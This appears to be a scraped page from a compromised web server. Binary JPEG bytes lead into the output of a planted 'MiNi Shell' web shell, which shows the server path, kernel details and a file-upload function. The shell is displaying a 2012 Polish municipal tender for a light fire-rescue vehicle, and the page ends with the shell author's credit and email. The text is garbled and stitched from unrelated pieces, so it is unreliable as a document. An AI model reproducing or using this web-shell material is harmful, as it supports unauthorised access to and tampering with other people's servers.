JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120525/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20120525/173322-N-2012.html

<p class="kh_header"><b>Czarna: Dostawa lekkiego samochodu ratowniczo - gaśniczego dla Ochotniczej Straży Pożarnej  w Medyni Łańcuckiej</b><br>
<b>Numer ogłoszenia: 173322 - 2012; data zamieszczenia: 25.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Czarna , Czarna 260, 37-125 Czarna, woj. podkarpackie, tel. 017 2262324, 017 2262606, faks 017 2262324 w. 232.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gminaczarna.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa lekkiego samochodu ratowniczo - gaśniczego dla Ochotniczej Straży Pożarnej  w Medyni Łańcuckiej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa lekkiego samochodu ratowniczo - gaśniczego dla Ochotniczej Straży Pożarnej          w Medyni Łańcuckiej

Przedmiot zamówienia obejmuje dostawę fabrycznie nowego (rok produkcji 2012) lekkiego
samochodu ratowniczo - gaśniczego z przeznaczeniem dla jednostki Ochotniczej Straży Pożarnej w Medyni łańcuckiej. Zamówienie obejmuje zabudowę pożarniczą pojazdu. Pojazd musi spełniać m.inn. następujące wymogi:
Wymagania polskich przepisów o ruchu drogowym z uwzględnieniem wymagań dotyczących pojazdów uprzywilejowanych zgodnie z Ustawą Prawo o ruchu drogowym. Pojazd musi posiadać świadectwo dopuszczenia do stosowania w ochronie przeciwpożarowej na terenie Polski zgodnie z Rozporządzeniem MSWIA      z dnia 20 czerwca 2007 r. (Dz. U. z 2007 r. Nr 143 poz. 1002). Podwozie pojazdu musi posiadać świadectwo homologacji, z którego wyciąg musi zostać dostarczony wraz z pojazdem. Pojazd musi spełniać wymagania dla lekkiego samochodu ratowniczo - gaśniczego do 3,5 t.
Wymagania techniczno-użytkowe określone w pkt 4.1, 4.2 i 4.3 Załącznika Nr 2 do Rozporządzenia MSWiA z dnia 20.06.2007 r. w sprawie wykazu wyrobów służących zapewnieniu zasad bezpieczeństwa publicznego lub ochronie zdrowia i życia oraz mienia, a także zasad wydawania dopuszczenia tych wyrobów do użytkowania (Dz. U. z 2007 r. Nr 143, poz. 1002). Podwozie musi posiadać świadectwo homologacji.
Rok produkcji: 2012 (fabrycznie nowy).
Dopuszczalna masa całkowita: nie większa niż 3 500 kg.
Silnik:
pojemność minimalna 2290 cm3 (turbo-diesel )
moc minimalna 125 KM
moment obrotowy 310 Nm
norma emisji spalin: Euro 5
Skrzynia biegów:
manualna 6-cio biegowa
Układ przeniesienia napędu - 4 x 2 na tylną oś koła podwójne
Wymiary pojazdu:
rozstaw osi minimum 3600 mm.
wysokość zewnętrzna minimum  2200 mm  maksimum  2500 mm
szerokość bez lusterek  2070 mm.	
długość   maksimum  6600mm ( z wyciągarką i drabinką  wejściową na nadwozie)
liczba miejsc 6
Hamulce:
ABS + EBV 
system ESP     
 Układ kierowniczy:
ze wspomaganiem
 Koła
felgi stalowe 16 cali
samochód na oponach całorocznych o wym.195 x 75 x 16
Nadwozie:
kolor czerwień 
poszycie wewnętrzne sufitu w części pasażerskiej wykonane z wykładziny materiałowej
wykończenie ścian wnętrza z tworzywa
wzmocnione zawieszenie
 Podłoga:
wykładzina antypoślizgowa
 Okna  drzwi:
szyby przyciemniane o wysokiej zdolności filtrowania,
przeszklenie samochodu w części osobowej,
nadwozie 4 - drzwiowe,
szyby w drzwiach przednich reg. elektrycznie,
szyby w drzwiach tylnych przesuwne.
 Ogrzewanie  chłodzenie:
ogrzewanie w części osobowej samochodu
klimatyzacja manualna
 Wyposażenie fabryczne:
radio-odtwarzacz CD RDS+ MP3+ 2 głośniki,
centralny zamek zdalnie sterowany + immobiliser,
poduszka powietrzna kierowcy,
lusterka podgrzewane, regulowane elektrycznie,
regulowany fotel kierowcy w trzech płaszczyznach,
zagłówki foteli przednich i tylnych z pełna regulacja na wysokość,
pasy bezpieczeństwa 3 - punktowe na przednich i tylnych fotelach,
komputer pokładowy,
trójkąt ostrzegawczy, apteczka, gaśnica.
 Wyposażenie zabudowy:
belka świetlna z napisem Straż z przodu pojazdu LED i lampa błyskowa z tyłu pojazdu LED
lampy przednie błyskowe LED umieszczone na wysokości lusterek samochodu osobowego w przedzie pojazdu mogą być schowane w atrapie, 
generator sygnałów świetlnych i dźwiękowych z możliwością podawania komunikatów zamontowany tak aby kierowca i dowódca miały swobodny dostęp ( po środku),
oświetlenie przedziału pasażerskiego włączane automatycznie i niezależnie                    z przedziału pasażerskiego,
oświetlenie typu LED przedziału ładunkowego uruchamiane automatycznie wraz           z otwarciem żaluzji, główny włącznik oświetlenia przedziału ładunkowego zainstalowany w kabinie kierowcy,
oświetlenie terenu wokół pojazdu w układzie 2+2+1, lampy zamontowane                     w skrajnych częściach dachu załączane z kabiny kierowcy,
 na dachu pojazdu zamontowany halogen zapewniający oświetlenie powierzchni dachu w warunkach słabej widoczności, 
konstrukcja zabudowy szkieletowa wykonana z kształtowników ze stali nierdzewnej, poszycie wykonane z gładkiej blachy aluminiowej,
zabudowa przedziału sprzętowego zamykana żaluzjami tylną i bocznymi                       w układzie 2+2+1, wszystkie zamykane jednym kluczem, 
boczne żaluzje - szerokość minimum 1400 mm,
tylna żaluzja - szerokość minimum 900 mm,
długość zabudowy:  - minimum 2900 mm, 
podłoga w przedziale ładunkowym antypoślizgowa wykonana z aluminiowej blachy ryflowanej
 Skrytka pierwsza za kabiną pojazdu (po stronie kierowcy)
prowadnice  (sanie) do mocowania motopompy PO -5  wraz  z prowadnicami wystawianymi na zewnątrz (dla ułatwienia przetransportowania motopompy                 na samochód) wyposażonymi w mechanizm zabezpieczający przed ich przemieszczaniem się,
wysuwna półka pionowa 1 szt z uchwytami do zamocowania 2 szt. aparatów ODO FENZY AERIS II  o długości  około 1000 mm,
półka stała na wysokości 880 mm (dół półki)  od podłogi przez całą długość skrytki (1400 mm),  głębokość około 550 mm, połączona ze skrytką z przeciwnej strony poprzeczną  półką  (rynienkę ) o szerokości około 600mm, która  stanowić będzie półkę na deskę ortopedyczną i szyny Kramera,
podłoga w skrytce posiadać będzie wzmocnienie umożliwiające transport motopompy  o masie około 200 kg  (motopompa PO-5) 
 Skrytka 2  po stronie  kierowcy 
regał  na  węże tłoczne W-52 -  szt. 4  i W-75 - szt. 6  z taśmami na rzepy zapobiegające wypadnięciu węży,
uchwyt na pilarkę SHTIL,  
skrzyneczki na 2 kanistry 5 l, 
podstawa do mocowania małej skrzynki narzędziowej,
zamontowane na stałe do podłogi nasady 52 - szt  3, 75 - szt. 2  i 110 - szt. 1
skrytka  powinna posiadać ścianę z  blachy aluminiowej  zabezpieczającą  przed ewentualnym  dostaniem się sprzętu do tylnej i przedniej skrytki.
 Skrytka 1 za kabiną pojazdu (po stronie pasażera)
półka stała na wysokości 880 mm (dół półki)  od podłogi przez całą długość skrytki (1400 mm),  głębokość około 550 mm, połączona ze skrytką z przeciwnej strony poprzeczną  półką  (rynienkę ) o szerokości około 600 mm, która  stanowić będzie półkę na deskę ortopedyczną i szyny Kramera,
uchwyty (mocowania)  zapobiegające przesuwaniu się sprzętu tj.( agregat GECO, pompy HONDA SST50).
 Skrytka 2 po stronie pasażera
półka stała na wysokości umożliwiającej swobodne umieszczenie torby PSP R1, przez całą długość skrytki (1400 mm), o  głębokość około 550 mm,
skrzynka na 2 gaśnice 6 kg, 
skrzynka na 2 lampy błyskowe,
uchwyty do mocowania pachołków,
skrytka  oraz półka powinny posiadać ścianę z  blachy aluminiowej  zabezpieczającą  przed ewentualnym  dostaniem się sprzętu do tylnej i przedniej skrytki.
 Skrytka tylna
wysuwna taca o szerokości żaluzji i o długości około 1200 mm do zamontowania            i transportu sprzętu ratownictwa technicznego,
wysuwna podwieszana szuflada na szerokość żaluzji i o długości około 1200mm 
 Na platformie dachowej 
uchwyty mocujące drabinę nasadkową DN 2,7 drewnianą (trzy przęsła) zamontowane po  lewej stronie patrząc do kierunku jazdy,
uchwyty mocujące 2 szt  węży  ssawnych 110 o długości 2400 mm,
skrzynia  o wymiarach:  szer. 500mm , wys. min 250 mm,  dł. 1600 mm, wyposażona w oświetlenie, zamontowana po prawej stronie  w takiej odległości od kabiny aby zmieściły się najaśnice od masztu, 
podest dachowy w formie roboczej z materiału nierdzewnego antypoślizgowego wytrzymały na obciążenie dwóch strażaków i przewożonego na nim sprzętu,
drabinka umożliwiająca wejście na dach zamocowana na stałe do zabudowy
 Pozostałe wyposażenie
wyciągarka samochodowa o parametrach: uciąg 3500 kg. silnik : 5,5 KM.12V szeregowy prądu stałego, zdalne sterowanie, przekładnia 3 - stopniowa planetarna, hak , prowadnica rolkowa,
fala świetlna 8-ledowa  informująca o kierunku omijania samochodu, zamontowana       z tylu pojazdu,
halogen przenośny typu szperacz,
indywidualne oświetlenie nad siedzeniem dowódcy,
tylny zaczep na sworzeń,
system ładowania akumulatora 230 V,
główny wyłącznik prądu urządzeń pozafabrycznych,
oznakowanie pojazdu numerami operacyjnymi z tyłu i po bokach pojazdu a także         na dachu nadwozia oraz po bokach nazwą jednostki OSP Medynia Łańcucka                   i logo Gminy Czarna,
montaż radiotelefonu typu Motorola GM 360 w kabinie kierowcy (radiostacja dostarczona przez OSP Medynia Łańcucka),
radiotelefon nasobny Motorola GP 360 z zamontowaną na stałe ładowarką - bazą         (1 kpl)  i podpiętą  do zasilania na stałe (nie z gniazda zapalniczki) w kabinie kierowcy,
maszt oświetleniowy pneumatyczny, zdalnie sterowany, o wysokości do 4,5 od podłoża,  z  najaśnicami o łącznej mocy 2000 W, montowany na stałe                   w przedziale ładunkowym, sterowanie zamontowane w 1 skrytce od pasażera oraz maszt, zamontowany tak aby najaśnice znajdowały się między kabiną a skrzynią na sprzęt           na platformie dachowej
gaśnice proszkowe ABC  6 kg - 2 szt.
kanister metalowy 5l  - 2 szt.
drabina nasadkowa drewniana DN 2,7 - 2 szt.
orurowanie przodu pojazdu,
pachołki drogowe o wysokości do 45 cm  - 8 szt.
 Uwagi ogólne:
regały i półki wykonane z materiałów nierdzewnych,
szuflady i wysuwne tace, muszą się automatycznie blokować w pozycji zamkniętej    i całkowicie otwartej, oraz posiadać zabezpieczenie przed całkowitym wypadnięciem a także być oznakowane  w miejscu najdalej wysuniętym                  od zabudowy (widoczne w dzień i szczególnie w nocy dla pojazdów przejeżdżających obok),
 uchwyty, klamki wszystkich urządzeń samochodu, drzwi żaluzjowych, szuflad, podestów, tac, muszą być tak skonstruowane, aby umożliwiały ich obsługę               w rękawicach

Warunki i okres gwarancji:
Gwarancja silnik i podzespoły 24 miesiące
Gwarancja na nadwozie (perforacje blach) 72 miesięcy (6 lat)
Gwarancja na powlokę lakiernicza 36 miesięcy
Wykonanie

Minimalne wymagania pojazdu muszą być zgodne z  Wymaganiami dla samochodów ratowniczo - gaśniczych i samochodów ratownictwa technicznego dla Ochotniczych Straży Pożarnych (dotyczących lekkiego samochodu ratowniczo - gaśniczego) - Edycja II - marzec 2006  
Samochód musi posiadać aktualne świadectwo dopuszczenia wydane przez CNBOP w Józefowie..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 34.11.40.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.09.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a) posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania - ocena spełniania  tego warunku to podpisanie oświadczenia z art. 22 ust.1 załączonego do niniejszej SIWZ,</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>posiadania wiedzy i doświadczenia, tj. wykonali, w okresie trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, zrealizowali co najmniej 1 dostawę odpowiadającą swoim rodzajem dostawom stanowiącym przedmiot zamówienia (dostawa lekkiego samochodu pożarniczego).
Ocena spełnienia tego warunku będzie dokonana na podstawie załączonych do oferty następujących dokumentów: wykazu wykonanych dostaw, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców oraz dokumentów potwierdzających, że dostawy te zostały wykonane lub                 są wykonywane należycie (referencje),</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie wykonawca jest zobowiązany wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie wykonawca jest zobowiązany wykazać w sposób szczególny.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>ocena spełniania  tego warunku to podpisanie oświadczenia z art. 22 ust.1 załączonego do niniejszej SIWZ,</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>- wykaz części zamówienia, których wykonanie Wykonawca zamierza powierzyć podwykonwacą</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający dopuszcza wprowadzenie zmian postanowień umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, jeżeli konieczność wprowadzenia takich zmian wynika z okoliczności, których nie można było przewidzieć w ogłoszeniu lub SIWZ,                       w następujących okolicznościach i zakresie:
1) wystąpienia robót dodatkowych, o których mowa w art. 67 ust. 1 pkt 5 ustawy Prawo Zamówień  
   Publicznych .
2)  Inne postanowienia mogące ulec zmianie :
a)  wystąpienia zmian powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ 
    na realizację przedmiotu zamówienia,
b) możliwa jest zmiana wysokości wynagrodzenia wykonawcy w przypadku rezygnacji z części 
   zamówienia lub konieczności wykonania dostaw zamiennych, jeżeli będzie to niezbędne dla
   prawidłowej  realizacji przedmiotu umowy. 
2.  Zmiany i uzupełnienia umowy wymagają dla swojej ważności formy pisemnej i muszą być 
    akceptowane przez obie strony umowy. 
3. W sprawach nie uregulowanych w niniejszej umowie zastosowanie będą miały przepisy 
    Kodeksu Cywilnego i ustawy Prawo zamówień publicznych.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gminaczarna.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urzędzie Gminy Czarna 37-125 Czarna 260, powiat łańcucki,.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.06.2012 godzina 08:30, miejsce: Urząd Gminy w Czarnej
Czarna 260
37-125 Czarna
Sekretariat, pokój nr 10.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com